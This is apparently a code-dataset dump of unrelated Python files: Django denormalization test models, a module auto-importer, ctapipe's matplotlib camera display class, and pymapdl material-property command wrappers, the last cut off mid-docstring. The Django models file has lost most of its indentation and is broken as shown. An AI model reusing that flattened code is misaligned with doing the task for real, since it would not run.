@denormalized(models.TextField)
@depend_on_related(FailingTriggersModelA)
def SomeWeirdName(self):
return self.a.SomeWeirdName
class CachedModelA(models.Model):
b = models.ForeignKey('CachedModelB', on_delete=models.CASCADE)
@cached(cache)
@depend_on_related('CachedModelB')
def cached_data(self):
return {
'upper': self.b.data.upper(),
'lower': self.b.data.lower(),
}
class CachedModelB(models.Model):
data = models.CharField(max_length=255)
class AbstractDenormModel(models.Model):
# Skip feature test main model.
text = models.TextField()
@denormalized(models.TextField)
def ham(self):
return u"Ham and %s" % self.text
class Meta:
abstract = True
app_label = 'test_app'
class DenormModel(AbstractDenormModel):
@denormalized(models.TextField)
def spam(self):
return u"Spam and %s" % self.text
class Meta(AbstractDenormModel.Meta):
swappable = 'DENORM_MODEL'
class RealDenormModel(AbstractDenormModel):
@denormalized(models.TextField)
def eggs(self):
return u"Eggs and %s" % self.text
class Meta(AbstractDenormModel.Meta):
pass
class Tag(models.Model):
name = models.CharField(max_length=255)
content_type = models.ForeignKey(contenttypes.models.ContentType, on_delete=models.CASCADE)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey('content_type', 'object_id')
class TaggedModel(models.Model):
tags = GenericRelation(Tag)
@denormalized(models.TextField)
@depend_on_related(Tag)
def tags_string(self):
return ', '.join(sorted([t.name for t in self.tags.all()]))
class Meta:
abstract = True
class Forum(TaggedModel):
title = models.CharField(max_length=255)
# Simple count() aggregate
post_count = CountField('post_set')
cachekey = CacheKeyField()
cachekey.depend_on_related('Post')
@denormalized(models.CharField, max_length=255)
@depend_on_related('Post')
def author_names(self):
return ', '.join((m.author_name for m in self.post_set.all()))
@denormalized(models.ManyToManyField, 'Member', blank=True)
@depend_on_related('Post')
def authors(self):
return [m.author for m in self.post_set.all() if m.author]
# let's say this forums supports subforums, sub-subforums and so forth
# so we can test depend_on_related('self') (for tree structures).
parent_forum = models.ForeignKey('self', blank=True, null=True, on_delete=models.CASCADE)
@denormalized(models.TextField)
@depend_on_related('self', type='forward')
def path(self):
if self.parent_forum:
return self.parent_forum.path + self.title + '/'
else:
return '/' + self.title + '/'
class Post(TaggedModel):
forum = models.ForeignKey(Forum, blank=True, null=True, on_delete=models.CASCADE)
author = models.ForeignKey('Member', blank=True, null=True, on_delete=models.CASCADE)
response_to = models.ForeignKey('self', blank=True, null=True, related_name='responses', on_delete=models.CASCADE)
title = models.CharField(max_length=255, blank=True)
# Brings down the forum title
@denormalized(models.CharField, max_length=255)
@depend_on_related(Forum)
def forum_title(self):
return self.forum.title
@denormalized(models.CharField, max_length=255)
@depend_on_related('Member', foreign_key="author")
def author_name(self):
if self.author:
return self.author.name
else:
return ''
@denormalized(models.PositiveIntegerField)
@depend_on_related('self', type='backward')
def response_count(self):
# Work around odd issue during testing with PostgresDB
if not self.pk:
return 0
rcount = self.responses.count()
rcount += sum((x.response_count for x in self.responses.all()))
return rcount
class PostExtend(models.Model):
# Test also OneToOneField
post = models.OneToOneField('Post', on_delete=models.CASCADE)
@denormalized(models.CharField, max_length=255)
@depend_on_related('Post')
def author_name(self):
        return self.post.author.name
class Attachment(models.Model):
forum_as_object = False
post = models.ForeignKey(Post, blank=True, null=True, on_delete=models.CASCADE)
cachekey = CacheKeyField()
cachekey.depend_on_related('Post')
@denormalized(models.ForeignKey, Forum, blank=True, null=True, on_delete=models.CASCADE)
@depend_on_related(Post)
def forum(self):
if self.post and self.post.forum:
if self.forum_as_object:
# if forum_as_object is set, return forum denorm as an object
return self.post.forum
else:
# otherwise, return as a primary key
return self.post.forum.pk
return None
class Member(models.Model):
first_name = models.CharField(max_length=255)
name = models.CharField(max_length=255)
bookmarks = models.ManyToManyField('Post', blank=True)
cachekey = CacheKeyField()
cachekey.depend_on_related('Post', foreign_key='bookmarks')
@denormalized(models.CharField, max_length=255)
def full_name(self):
return u"%s %s" % (self.first_name, self.name)
@denormalized(models.TextField, null=True, blank=True)
@depend_on_related('Post', foreign_key="bookmarks")
def bookmark_titles(self):
if self.id:
return '\n'.join([p.title for p in self.bookmarks.all()])
class SkipPost(models.Model):
# Skip feature test main model.
text = models.TextField()
class CallCounter(models.Model):
@denormalized(models.IntegerField)
def called_count(self):
if not self.called_count:
return 1
return self.called_count + 1
class CallCounterProxy(CallCounter):
class Meta:
proxy = True
class SkipComment(models.Model):
post = models.ForeignKey(SkipPost, on_delete=models.CASCADE)
text = models.TextField()
created_on = models.DateTimeField(auto_now_add=True)
updated_on = models.DateTimeField(auto_now=True, null=True, blank=True)
class Meta:
abstract = True
class SkipCommentWithoutSkip(SkipComment):
# Skip feature test model without a skip parameter on an updatable field.
    # The updatable field will not be skipped.
@denormalized(models.TextField)
@depend_on_related(SkipPost)
def post_text(self):
return self.post.text
class SkipCommentWithSkip(SkipComment):
# Skip feature test model with a skip parameter on an updatable field.
@denormalized(models.TextField, skip=('updated_on',))
@depend_on_related(SkipPost)
def post_text(self):
return self.post.text
class SkipCommentWithAttributeSkip(SkipComment):
@denormalized(models.TextField)
@depend_on_related(SkipPost)
def post_text(self):
return self.post.text
denorm_always_skip = ('updated_on',)
class Team(models.Model):
@denormalized(models.TextField)
@depend_on_related('Competitor')
def user_string(self):
return ', '.join(sorted([u.name for u in self.competitor_set.all()]))
class Competitor(models.Model):
name = models.TextField()
team = models.ForeignKey(Team, on_delete=models.CASCADE)
if connection.vendor != "sqlite":
class FilterSumModel(models.Model):
# Simple count() aggregate
active_item_sum = SumField('counts', field='active_item_count', filter={'age__gte': 18})
class FilterSumItem(models.Model):
parent = models.ForeignKey(FilterSumModel, related_name='counts', on_delete=models.CASCADE)
age = models.IntegerField(default=18)
active_item_count = models.PositiveIntegerField(default=False)
class FilterCountModel(models.Model):
# Simple count() aggregate
active_item_count = CountField('items', filter={'active__exact': True}, exclude={'text': ''})
class FilterCountItem(models.Model):
parent = models.ForeignKey(FilterCountModel, related_name='items', on_delete=models.CASCADE)
active = models.BooleanField(default=False)
text = models.CharField(max_length=10, default='')
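# Illustrative usage sketch (not part of the original test models): how the
# denormalized fields above are expected to behave. It assumes denorm.flush()
# is the entry point that applies any queued denormalization updates.
def _example_denorm_usage():
    import denorm
    forum = Forum.objects.create(title="General")
    member = Member.objects.create(first_name="Ada", name="Lovelace")
    Post.objects.create(forum=forum, author=member, title="Hello")
    denorm.flush()  # assumed helper; processes pending denorm updates
    forum.refresh_from_db()
    assert forum.post_count == 1
    assert "Lovelace" in forum.author_names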
| 30.801347
| 118
| 0.697311
|
5d1b1c978ff48253495b6f6c39f34ab57d5ed4bd
| 314
|
py
|
Python
|
clks/optim/__init__.py
|
cjliux/mdst.c2f
|
5617624b25ddaa11ffbc07401d3fe0276ca220d5
|
[
"BSD-3-Clause"
] | 2
|
2020-07-17T12:12:35.000Z
|
2020-09-12T14:28:55.000Z
|
clks/optim/__init__.py
|
cjliux/mdst.c2f
|
5617624b25ddaa11ffbc07401d3fe0276ca220d5
|
[
"BSD-3-Clause"
] | null | null | null |
clks/optim/__init__.py
|
cjliux/mdst.c2f
|
5617624b25ddaa11ffbc07401d3fe0276ca220d5
|
[
"BSD-3-Clause"
] | null | null | null |
#coding: utf-8
# automatically import any Python files in the directory
import os
import importlib
for file in os.listdir(os.path.dirname(__file__)):
if file.endswith('.py') and not file.startswith('_'):
module = file[:file.find('.py')]
importlib.import_module('clks.optim.' + module)
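# In practice this means that adding a new optimizer module, e.g. a
# hypothetical clks/optim/sgd.py, makes it importable as clks.optim.sgd as a
# side effect of importing this package; no explicit import needs to be added here.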
| 31.4
| 57
| 0.678344
|
8cd4914f1a5defa0d752efd6236efbea385f0148
| 16,719
|
py
|
Python
|
ctapipe/visualization/mpl_camera.py
|
chaimain/ctapipe
|
ff80cff2daaf56e1d05ea6501c68fd83a9cf79d5
|
[
"BSD-3-Clause"
] | null | null | null |
ctapipe/visualization/mpl_camera.py
|
chaimain/ctapipe
|
ff80cff2daaf56e1d05ea6501c68fd83a9cf79d5
|
[
"BSD-3-Clause"
] | null | null | null |
ctapipe/visualization/mpl_camera.py
|
chaimain/ctapipe
|
ff80cff2daaf56e1d05ea6501c68fd83a9cf79d5
|
[
"BSD-3-Clause"
] | null | null | null |
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
Visualization routines using matplotlib
"""
import copy
import logging
import numpy as np
from astropy import units as u
from matplotlib import pyplot as plt
from matplotlib.collections import PatchCollection
from matplotlib.colors import Normalize, LogNorm, SymLogNorm
from matplotlib.patches import Ellipse, RegularPolygon, Rectangle, Circle
from numpy import sqrt
from ctapipe.instrument import PixelShape
__all__ = ["CameraDisplay"]
logger = logging.getLogger(__name__)
def polar_to_cart(rho, phi):
""""returns r, theta(degrees)"""
x = rho * np.cos(phi)
y = rho * np.sin(phi)
return x, y
class CameraDisplay:
"""
Camera Display using matplotlib.
Parameters
----------
geometry : `~ctapipe.instrument.CameraGeometry`
Definition of the Camera/Image
image: array_like
array of values corresponding to the pixels in the CameraGeometry.
ax : `matplotlib.axes.Axes`
A matplotlib axes object to plot on, or None to create a new one
title : str (default "Camera")
Title to put on camera plot
norm : str or `matplotlib.color.Normalize` instance (default 'lin')
Normalization for the color scale.
Supported str arguments are
- 'lin': linear scale
- 'log': logarithmic scale (base 10)
cmap : str or `matplotlib.colors.Colormap` (default 'hot')
Color map to use (see `matplotlib.cm`)
allow_pick : bool (default False)
if True, allow user to click and select a pixel
autoupdate : bool (default True)
redraw automatically (otherwise need to call plt.draw())
autoscale : bool (default True)
rescale the vmin/vmax values when the image changes.
        This is set to False if `set_limits_*` is called to explicitly
set data limits.
Notes
-----
Speed:
CameraDisplay is not intended to be very fast (matplotlib
        is not a high-performance graphics library; it is
        intended for producing nice output plots). However, most of the
slowness of CameraDisplay is in the constructor. Once one is
displayed, changing the image that is displayed is relatively
fast and efficient. Therefore it is best to initialize an
instance, and change the data, rather than generating new
CameraDisplays.
Pixel Implementation:
Pixels are rendered as a
`matplotlib.collections.PatchCollection` of Polygons (either 6
or 4 sided). You can access the PatchCollection directly (to
e.g. change low-level style parameters) via
`CameraDisplay.pixels`
Output:
Since CameraDisplay uses matplotlib, any display can be
saved to any output file supported via
plt.savefig(filename). This includes ``.pdf`` and ``.png``.
"""
def __init__(
self,
geometry,
image=None,
ax=None,
title=None,
norm="lin",
cmap=None,
allow_pick=False,
autoupdate=True,
autoscale=True,
show_frame=True,
):
self.axes = ax if ax is not None else plt.gca()
self.pixels = None
self.colorbar = None
self.autoupdate = autoupdate
self.autoscale = autoscale
self._active_pixel = None
self._active_pixel_label = None
self._axes_overlays = []
self.geom = geometry
if title is None:
title = f"{geometry.camera_name}"
# initialize the plot and generate the pixels as a
# RegularPolyCollection
patches = []
if hasattr(self.geom, "mask"):
self.mask = self.geom.mask
else:
self.mask = np.ones_like(self.geom.pix_x.value, dtype=bool)
pix_x = self.geom.pix_x.value[self.mask]
pix_y = self.geom.pix_y.value[self.mask]
pix_width = self.geom.pixel_width.value[self.mask]
for x, y, w in zip(pix_x, pix_y, pix_width):
if self.geom.pix_type == PixelShape.HEXAGON:
r = w / np.sqrt(3)
patch = RegularPolygon(
(x, y),
6,
radius=r,
orientation=self.geom.pix_rotation.to_value(u.rad),
fill=True,
)
elif self.geom.pix_type == PixelShape.CIRCLE:
patch = Circle((x, y), radius=w / 2, fill=True)
elif self.geom.pix_type == PixelShape.SQUARE:
patch = Rectangle(
(x - w / 2, y - w / 2),
width=w,
height=w,
angle=self.geom.pix_rotation.to_value(u.deg),
fill=True,
)
patches.append(patch)
self.pixels = PatchCollection(patches, cmap=cmap, linewidth=0)
self.axes.add_collection(self.pixels)
self.pixel_highlighting = copy.copy(self.pixels)
self.pixel_highlighting.set_facecolor("none")
self.pixel_highlighting.set_linewidth(0)
self.axes.add_collection(self.pixel_highlighting)
# Set up some nice plot defaults
self.axes.set_aspect("equal", "datalim")
self.axes.set_title(title)
self.axes.autoscale_view()
if show_frame:
self.add_frame_name()
# set up a patch to display when a pixel is clicked (and
# pixel_picker is enabled):
self._active_pixel = copy.copy(patches[0])
self._active_pixel.set_facecolor("r")
self._active_pixel.set_alpha(0.5)
self._active_pixel.set_linewidth(2.0)
self._active_pixel.set_visible(False)
self.axes.add_patch(self._active_pixel)
if hasattr(self._active_pixel, "xy"):
center = self._active_pixel.xy
else:
center = self._active_pixel.center
self._active_pixel_label = self.axes.text(
*center, "0", horizontalalignment="center", verticalalignment="center"
)
self._active_pixel_label.set_visible(False)
# enable ability to click on pixel and do something (can be
# enabled on-the-fly later as well:
if allow_pick:
self.enable_pixel_picker()
if image is not None:
self.image = image
else:
self.image = np.zeros_like(self.geom.pix_id, dtype=np.float64)
self.norm = norm
self.auto_set_axes_labels()
def highlight_pixels(self, pixels, color="g", linewidth=1, alpha=0.75):
"""
Highlight the given pixels with a colored line around them
Parameters
----------
pixels : index-like
The pixels to highlight.
Can either be a list or array of integers or a
boolean mask of length number of pixels
color: a matplotlib conform color
the color for the pixel highlighting
linewidth: float
linewidth of the highlighting in points
alpha: 0 <= alpha <= 1
The transparency
"""
l = np.zeros_like(self.image)
l[pixels] = linewidth
self.pixel_highlighting.set_linewidth(l)
self.pixel_highlighting.set_alpha(alpha)
self.pixel_highlighting.set_edgecolor(color)
self._update()
def enable_pixel_picker(self):
""" enable ability to click on pixels """
self.pixels.set_picker(True) # enable click
self.pixels.set_pickradius(
sqrt(u.Quantity(self.geom.pix_area[0]).value) / np.pi
)
self.pixels.set_snap(True) # snap cursor to pixel center
self.axes.figure.canvas.mpl_connect("pick_event", self._on_pick)
def set_limits_minmax(self, zmin, zmax):
""" set the color scale limits from min to max """
self.pixels.set_clim(zmin, zmax)
self.autoscale = False
self._update()
def set_limits_percent(self, percent=95):
""" auto-scale the color range to percent of maximum """
zmin = np.nanmin(self.pixels.get_array())
zmax = np.nanmax(self.pixels.get_array())
dz = zmax - zmin
frac = percent / 100.0
self.autoscale = False
self.set_limits_minmax(zmin, zmax - (1.0 - frac) * dz)
@property
def norm(self):
"""
The norm instance of the Display
Possible values:
- "lin": linear scale
- "log": log scale (cannot have negative values)
- "symlog": symmetric log scale (negative values are ok)
- any matplotlib.colors.Normalize instance, e. g. PowerNorm(gamma=-2)
"""
return self.pixels.norm
@norm.setter
def norm(self, norm):
if norm == "lin":
self.pixels.norm = Normalize()
elif norm == "log":
self.pixels.norm = LogNorm()
self.pixels.autoscale() # this is to handle matplotlib bug #5424
elif norm == "symlog":
self.pixels.norm = SymLogNorm(linthresh=1.0, base=10)
self.pixels.autoscale()
elif isinstance(norm, Normalize):
self.pixels.norm = norm
else:
raise ValueError(
"Unsupported norm: '{}', options are 'lin',"
"'log','symlog', or a matplotlib Normalize object".format(norm)
)
self.update(force=True)
self.pixels.autoscale()
@property
def cmap(self):
"""
Color map to use. Either a name or `matplotlib.colors.ColorMap`
instance, e.g. from `matplotlib.pyplot.cm`
"""
return self.pixels.get_cmap()
@cmap.setter
def cmap(self, cmap):
self.pixels.set_cmap(cmap)
self._update()
@property
def image(self):
"""The image displayed on the camera (1D array of pixel values)"""
return self.pixels.get_array()
@image.setter
def image(self, image):
"""
Change the image displayed on the Camera.
Parameters
----------
image: array_like
array of values corresponding to the pixels in the CameraGeometry.
"""
image = np.asanyarray(image)
if image.shape != self.geom.pix_x.shape:
raise ValueError(
(
"Image has a different shape {} than the " "given CameraGeometry {}"
).format(image.shape, self.geom.pix_x.shape)
)
self.pixels.set_array(np.ma.masked_invalid(image[self.mask]))
self.pixels.changed()
if self.autoscale:
self.pixels.autoscale()
self._update()
def _update(self, force=False):
""" signal a redraw if autoupdate is turned on """
if self.autoupdate:
self.update(force)
def update(self, force=False):
""" redraw the display now """
self.axes.figure.canvas.draw()
if self.colorbar is not None:
if force is True:
self.colorbar.update_bruteforce(self.pixels)
else:
self.colorbar.update_normal(self.pixels)
self.colorbar.draw_all()
def add_colorbar(self, **kwargs):
"""
add a colorbar to the camera plot
kwargs are passed to `figure.colorbar(self.pixels, **kwargs)`
See matplotlib documentation for the supported kwargs:
http://matplotlib.org/api/figure_api.html#matplotlib.figure.Figure.colorbar
"""
if self.colorbar is not None:
raise ValueError(
"There is already a colorbar attached to this CameraDisplay"
)
else:
if "ax" not in kwargs:
kwargs["ax"] = self.axes
self.colorbar = self.axes.figure.colorbar(self.pixels, **kwargs)
self.update()
def add_ellipse(self, centroid, length, width, angle, asymmetry=0.0, **kwargs):
"""
plot an ellipse on top of the camera
Parameters
----------
centroid: (float, float)
position of centroid
length: float
major axis
width: float
minor axis
angle: float
rotation angle wrt x-axis about the centroid, anticlockwise, in radians
asymmetry: float
3rd-order moment for directionality if known
kwargs:
any MatPlotLib style arguments to pass to the Ellipse patch
"""
ellipse = Ellipse(
xy=centroid,
width=length,
height=width,
angle=np.degrees(angle),
fill=False,
**kwargs,
)
self.axes.add_patch(ellipse)
self.update()
return ellipse
def overlay_moments(
self, hillas_parameters, with_label=True, keep_old=False, **kwargs
):
"""helper to overlay ellipse from a `HillasParametersContainer` structure
Parameters
----------
hillas_parameters: `HillasParametersContainer`
structuring containing Hillas-style parameterization
with_label: bool
If True, show coordinates of centroid and width and length
keep_old: bool
If True, to not remove old overlays
kwargs: key=value
any style keywords to pass to matplotlib (e.g. color='red'
or linewidth=6)
"""
if not keep_old:
self.clear_overlays()
# strip off any units
cen_x = u.Quantity(hillas_parameters.x).value
cen_y = u.Quantity(hillas_parameters.y).value
length = u.Quantity(hillas_parameters.length).value
width = u.Quantity(hillas_parameters.width).value
el = self.add_ellipse(
centroid=(cen_x, cen_y),
length=length * 2,
width=width * 2,
angle=hillas_parameters.psi.to_value("rad"),
**kwargs,
)
self._axes_overlays.append(el)
if with_label:
text = self.axes.text(
cen_x,
cen_y,
"({:.02f},{:.02f})\n[w={:.02f},l={:.02f}]".format(
hillas_parameters.x,
hillas_parameters.y,
hillas_parameters.width,
hillas_parameters.length,
),
color=el.get_edgecolor(),
)
self._axes_overlays.append(text)
def clear_overlays(self):
""" Remove added overlays from the axes """
while self._axes_overlays:
overlay = self._axes_overlays.pop()
overlay.remove()
def _on_pick(self, event):
""" handler for when a pixel is clicked """
pix_id = event.ind[-1]
xx, yy, aa = (
u.Quantity(self.geom.pix_x[pix_id]).value,
u.Quantity(self.geom.pix_y[pix_id]).value,
u.Quantity(np.array(self.geom.pix_area)[pix_id]),
)
if self.geom.pix_type.startswith("hex"):
self._active_pixel.xy = (xx, yy)
else:
rr = sqrt(aa)
self._active_pixel.xy = (xx - rr / 2.0, yy - rr / 2.0)
self._active_pixel.set_visible(True)
self._active_pixel_label.set_x(xx)
self._active_pixel_label.set_y(yy)
self._active_pixel_label.set_text(f"{pix_id:003d}")
self._active_pixel_label.set_visible(True)
self._update()
self.on_pixel_clicked(pix_id) # call user-function
def on_pixel_clicked(self, pix_id):
"""virtual function to overide in sub-classes to do something special
when a pixel is clicked
"""
print(f"Clicked pixel_id {pix_id}")
def show(self):
self.axes.figure.show()
def auto_set_axes_labels(self):
""" set the axes labels based on the Frame attribute"""
axes_labels = ("X", "Y")
if self.geom.frame is not None:
axes_labels = list(
self.geom.frame.get_representation_component_names().keys()
)
self.axes.set_xlabel(f"{axes_labels[0]} ({self.geom.pix_x.unit})")
self.axes.set_ylabel(f"{axes_labels[1]} ({self.geom.pix_y.unit})")
def add_frame_name(self, color="grey"):
""" label the frame type of the display (e.g. CameraFrame) """
frame_name = (
self.geom.frame.__class__.__name__
if self.geom.frame is not None
else "Unknown Frame"
)
self.axes.text( # position text relative to Axes
1.0,
0.0,
frame_name,
ha="right",
va="bottom",
transform=self.axes.transAxes,
color=color,
fontsize="smaller",
)
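# A minimal usage sketch (illustrative, not part of the original module). It
# assumes CameraGeometry.from_name is available in the installed ctapipe
# version and that "LSTCam" is a known camera name there.
def _example_camera_display():
    from ctapipe.instrument import CameraGeometry
    geom = CameraGeometry.from_name("LSTCam")
    disp = CameraDisplay(geom, title="Example camera")
    disp.image = np.random.uniform(size=geom.n_pixels)  # arbitrary fake image
    disp.add_colorbar()
    disp.set_limits_percent(95)
    plt.show()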
| 32.911417
| 88
| 0.585023
|
a1798eccb28095249bc0bb281c9cfb4dcdd40c60
| 38,269
|
py
|
Python
|
src/ansys/mapdl/core/_commands/preproc/materials.py
|
Miiicah/pymapdl
|
ce85393ca82db7556a5d05883ca3fd9296444cba
|
[
"MIT"
] | 1
|
2022-02-09T01:12:02.000Z
|
2022-02-09T01:12:02.000Z
|
src/ansys/mapdl/core/_commands/preproc/materials.py
|
Miiicah/pymapdl
|
ce85393ca82db7556a5d05883ca3fd9296444cba
|
[
"MIT"
] | 9
|
2022-02-24T20:34:18.000Z
|
2022-03-31T20:44:17.000Z
|
src/ansys/mapdl/core/_commands/preproc/materials.py
|
lynch1972/pymapdl
|
46b31438af2a0d5b2d9a69abe82e0fe69935a855
|
[
"MIT"
] | null | null | null |
"""
These PREP7 commands are used to define the linear material properties.
"""
class Materials:
def emunit(self, lab="", value="", **kwargs):
"""APDL Command: EMUNIT
Specifies the system of units for magnetic field problems.
Parameters
----------
lab
Label specifying the type of units:
MKS - Rationalized MKS system of units (meters, amperes,
henries, webers, etc.). Free-space permeability is
            set to 4πe-7 henries/meter. Free-space
            permittivity is set to 8.85e-12 F/m.
MUZRO - User defined system of units. Free-space
permeability is set to the value input for
VALUE. Other units must correspond to the
permeability units. Relative permeability may be
altered to absolute values.
EPZRO - User defined system of units. Free-space
permittivity is set to the value input for
VALUE. Other units must correspond to the
permittivity units.
value
User value of free-space permeability (defaults to 1) if Lab =
MUZRO, or free-space permittivity (defaults to 1) if Lab = EPZRO.
Notes
-----
Specifies the system of units to be used for electric and magnetic
field problems. The free-space permeability and permittivity values may
be set as desired. These values are used with the relative property
values [MP] to establish absolute property values.
        Note: If the magnetic source field strength (Hs) has already been
calculated [BIOT], switching EMUNIT will not change the values.
For micro-electromechanical systems (MEMS), where dimensions are on the
order of microns, see the conversion factors in System of Units in the
Coupled-Field Analysis Guide.
This command is also valid in SOLUTION.
"""
command = "EMUNIT,%s,%s" % (str(lab), str(value))
return self.run(command, **kwargs)
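    # Usage sketch for the wrapper above (illustrative only):
    #
    #     mapdl.emunit("MKS")          # rationalized MKS units (mu_0 = 4*pi*1e-7 H/m)
    #     mapdl.emunit("MUZRO", 1.0)   # user-defined free-space permeability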
def mp(self, lab="", mat="", c0="", c1="", c2="", c3="", c4="", **kwargs):
"""APDL Command: MP
Defines a linear material property as a constant or a function of
temperature.
Parameters
----------
lab
Valid material property label. Applicable labels are listed under
"Material Properties" in the input table for each element type in
the Element Reference. See Linear Material Properties in the
Material Reference for more complete property label definitions:
ALPD
Mass matrix multiplier for damping.
ALPX
Secant coefficients of thermal expansion (also ``ALPY``, ``ALPZ``).
BETD
Stiffness matrix multiplier for damping.
.. note:: If used in an explicit dynamic analysis, the value corresponds to the percentage of damping in the high
frequency domain. For example, 0.1 roughly corresponds to 10% damping in the high frequency domain.
BETX
Coefficient of diffusion expansion (also ``BETY``, ``BETZ``)
BVIS
Bulk viscosity
C
Specific heat
CREF
Reference concentration (may not be temperature dependent)
CSAT
Saturated concentration
CTEX
Instantaneous coefficients of thermal expansion (also ``CTEY``, ``CTEZ``)
CVH
Heat coefficient at constant volume per unit of mass
DENS
Mass density.
DMPR
Constant structural damping coefficient in full harmonic analysis or damping ratio in mode-superposition
analysis.
DXX
Diffusivity coefficients (also ``DYY``, ``DZZ``)
EMIS
Emissivity.
ENTH
Enthalpy.
EX
Elastic moduli (also ``EY``, ``EZ``)
GXY
Shear moduli (also ``GYZ``, ``GXZ``)
HF
Convection or film coefficient
KXX
Thermal conductivities (also ``KYY``, ``KZZ``)
LSST
Electric loss tangent
LSSM
Magnetic loss tangent
MGXX
Magnetic coercive forces (also ``MGYY``, ``MGZZ``)
MURX
Magnetic relative permeabilities (also ``MURY``, ``MURZ``)
MU
Coefficient of friction
NUXY
Minor Poisson's ratios (also ``NUYZ``, ``NUXZ``) (``NUXY`` = νyx, as described in Stress-Strain Relationships in the
Mechanical APDL Theory Reference)
PERX
Electric relative permittivities (also ``PERY``, ``PERZ``)
.. note:: If you enter permittivity values less than 1 for ``SOLID5``, ``PLANE13``, or ``SOLID98``, the program interprets
the values as absolute permittivity. Values input for ``PLANE223``, ``SOLID226``, or ``SOLID227`` are always interpreted as
relative permittivity.
PRXY
Major Poisson's ratios (also ``PRYZ``, ``PRXZ``) (``PRXY`` = νxy, as described in Stress-
Strain Relationships in the Mechanical APDL Theory
Reference)
QRATE
Heat generation rate for thermal mass element MASS71. Fraction of plastic work
converted to heat (Taylor-Quinney coefficient) for coupled-
field elements ``PLANE223``, ``SOLID226``, and ``SOLID227``.
REFT
Reference temperature. Must be defined as a constant; ``C1`` through ``C4`` are
ignored.
RH
Hall Coefficient.
RSVX
Electrical resistivities (also ``RSVY``, ``RSVZ``).
SBKX
Seebeck coefficients (also ``SBKY``, ``SBKZ``).
SONC
Sonic velocity.
THSX
Thermal strain (also ``THSY``, ``THSZ``).
VISC
Viscosity.
mat
Material reference number to be associated with the elements
(defaults to the current MAT setting [MAT]).
c0
Material property value, or if a property-versus-temperature
polynomial is being defined, the constant term in the polynomial.
``C0`` can also be a table name (``%tabname%``); if ``C0`` is a table name, ``C1``
through ``C4`` are ignored.
c1, c2, c3, c4
Coefficients of the linear, quadratic, cubic, and quartic terms,
respectively, in the property-versus-temperature polynomial. Leave
blank (or set to zero) for a constant material property.
Notes
-----
MP defines a linear material property as a constant or in terms of a
fourth order polynomial as a function of temperature. (See the TB
command for nonlinear material property input.) Linear material
properties typically require a single substep for solution, whereas
nonlinear material properties require multiple substeps; see Linear
Material Properties in the Material Reference for details.
If the constants ``C1`` - ``C4`` are input, the polynomial
.. math::
Property = C_0 + C_1(T) + C_2(T)^2 + C_3(T)^3 + C_4(T)^4
is evaluated at discrete temperature points with linear interpolation
between points (that is, a piecewise linear representation) and a
constant-valued extrapolation beyond the extreme points. First-order
properties use two discrete points (±9999°).
The :meth:`MPTEMP <ansys.mapdl.core.Mapdl.mptemp>` or
:meth:`MPTGEN <ansys.mapdl.core.Mapdl.mptgen>`
commands must be used for second and higher order properties to define
appropriate temperature steps. To ensure that the number of
temperatures defined via the :meth:`MPTEMP <ansys.mapdl.core.Mapdl.mptemp>`
and :meth:`MPTGEN <ansys.mapdl.core.Mapdl.mptgen>` commands is minimally
sufficient for a reasonable representation of the curve, ANSYS
generates an error message if the number is less than ``N``, and a warning
message if the number is less than ``2N``. The value ``N`` represents the
highest coefficient used; for example, if ``C3`` is nonzero and ``C4`` is zero,
a cubic curve is being used which is defined using 4 coefficients so
that ``N`` = 4.
"""
command = "MP,%s,%s,%s,%s,%s,%s,%s" % (
str(lab),
str(mat),
str(c0),
str(c1),
str(c2),
str(c3),
str(c4),
)
return self.run(command, **kwargs)
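    # Usage sketch for MP (illustrative; the numbers are made up):
    #
    #     mapdl.mp("EX", 1, 2.0e11)         # constant Young's modulus for material 1
    #     mapdl.mp("DENS", 1, 7850, -0.3)   # density as the polynomial 7850 - 0.3*T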
def mpamod(self, mat="", deftemp="", **kwargs):
"""APDL Command: MPAMOD
Modifies temperature-dependent secant coefficients of thermal
expansion.
Parameters
----------
mat
Material number for which the secant coefficients of thermal
expansion (SCTE's) are to be modified. Defaults to 1.
deftemp
Definition temperature at which the existing SCTE-versus-
temperature tables were defined. Defaults to zero.
Notes
-----
This command converts temperature-dependent SCTE data (properties ALPX,
ALPY, ALPZ) from the definition temperature (DEFTEMP) to the reference
temperature defined by MP,REFT or TREF. If both the MP,REFT and TREF
commands have been issued, the reference temperature defined by the
MP,REFT command will be used.
This command does not apply to the instantaneous coefficients of
thermal expansion (properties CTEX, CTEY, CTEZ) or to the thermal
strains (properties THSX, THSY, THSZ).
See Linear Material Properties in the Mechanical APDL Material
Reference and the Mechanical APDL Theory Reference for more details.
This command is also valid in SOLUTION.
"""
command = "MPAMOD,%s,%s" % (str(mat), str(deftemp))
return self.run(command, **kwargs)
def mpchg(self, mat="", elem="", **kwargs):
"""APDL Command: MPCHG
Changes the material number attribute of an element.
Parameters
----------
mat
Assign this material number to the element. Material numbers are
defined with the material property commands [MP].
elem
Element for material change. If ALL, change materials for all
selected elements [ESEL].
Notes
-----
Changes the material number of the specified element. Between load
steps in SOLUTION, material properties cannot be changed from linear to
nonlinear, or from one nonlinear option to another.
If you change from one MKIN model to another MKIN model, the different
MKIN models need to have the same number of data points. This
requirement also applies if you change from one KINH model to another
KINH model, or from one CHABOCHE model to another CHABOCHE model.
"""
command = "MPCHG,%s,%s" % (str(mat), str(elem))
return self.run(command, **kwargs)
def mpcopy(self, matf="", matt="", **kwargs):
"""APDL Command: MPCOPY
Copies linear material model data from one material reference number to
another.
Parameters
----------
matf
Material reference number from where material property data will be
copied.
matt
Material reference number to where material property data will be
copied.
Notes
-----
The MPCOPY command copies linear material properties only, which are
all properties defined through the MP command. If you copy a model that
includes both linear and yield behavior constants (for example, a BKIN
model), the MPCOPY and TBCOPY, ALL commands are used together to copy
the entire model. All input data associated with the model is copied,
that is, all data defined through the MP and TB commands.
Also, if you copy a material model using the Material Model Interface
(Edit> Copy), both the commands MPCOPY and TBCOPY, ALL are issued,
regardless of whether the model includes linear constants only, or if
it includes a combination of linear and yield behavior constants.
This command is also valid in SOLUTION.
"""
command = "MPCOPY,%s,%s" % (str(matf), str(matt))
return self.run(command, **kwargs)
def mpdata(
self,
lab="",
mat="",
sloc="",
c1="",
c2="",
c3="",
c4="",
c5="",
c6="",
**kwargs,
):
"""APDL Command: MPDATA
Defines property data to be associated with the temperature table.
Parameters
----------
lab
Valid property label. Applicable labels are listed under "Material
Properties" in the input table for each element type in the Element
Reference. See Linear Material Properties in the Mechanical APDL
Material Reference for more complete property label definitions:
ALPD - Mass matrix multiplier for damping.
